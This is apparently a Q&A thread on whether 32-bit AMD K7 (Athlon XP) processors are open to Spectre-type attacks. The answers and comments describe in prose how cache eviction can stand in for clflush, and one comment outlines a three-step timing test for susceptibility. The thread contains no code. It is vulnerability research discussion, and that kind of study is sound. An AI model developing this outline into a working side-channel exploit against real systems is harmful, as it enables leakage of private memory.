Considering AMD K7-family (Ahtlon XP...) 32-bit only processors, have there been any published exploits (viz "Spectre" type attacks) or indications that such would be even remotely possible in practice ? While in theory, I understand, similar effects on the caches contents from (mis)speculated instructions are possible on those older processors than have been demonstrated on Itel/AMD 64, in practice I wonder whether there are the means for exploiting them on the platform under consideration. Specifically, lacking SSE2 and higher "goodies" ( clflush...), is it possible yet, using the comparatively reduced instruction set, to devise a working POC "reading" the leaked bits, at user privilege, and then, at a significant enough bit rate for such an attack to be a serious threat ? I'd appreciate to see example code if so...
2 Answers
Published exploits? Not that I'm aware of.
Indications that it would be possible? Yes. The K7 family, like its Intel counterparts, is an out-of-order design with a branch predictor. Those are the two critical parts for performing a Spectre attack. You don't need a cache-flush instruction to perform the attack, since you can get the same effect just by reading an area of memory you know the attack won't access. In fact, this is exactly how the Javascript proof-of-concept clears the cache, since Javascript JIT doesn't give access to clflush.
- 34,390
- 9
- 85
- 134
-
OK so IIUC a basic test (not an OS exploit) for CPU susceptibility to a Spectre variant is as simple as : 1) read-in enough contiguous memory to fill the data cache (thus implicitly flushing previously cached addresses). 2) speculatively access some test-location. 3) check (time) ordinary read from said location. // Could even be done in (big) real mode ! – NimbUs Feb 11 '18 at 11:46
It all really depends on if the out of order execution abilities of the CPU are advanced enough for Spectre to work. I haven't found any tests on such old hardware so far. For older PowerPC CPUs, it was determined that they do not according to an article on the TenFourFox blog.
- 402
- 2
- 7
-
The K7 is AMD's counterpart to the Pentium III. Both are fully out-of-order designs, and the PIII is certainly vulnerable to Spectre, so I find it highly improbable that the K7 isn't. – Mark Jan 20 '18 at 04:37
-
1Is there a published source somewhere that states that these older out of order CPUs are vulnerable to Spectre? Since Intel is much more popular than AMD, and all Spectre vulnerable Intel CPUs are also vulnerable to Meltdown, it seems that little attention has been paid to how these older CPUs are affected by Spectre. – Alex Cannon Feb 09 '18 at 02:16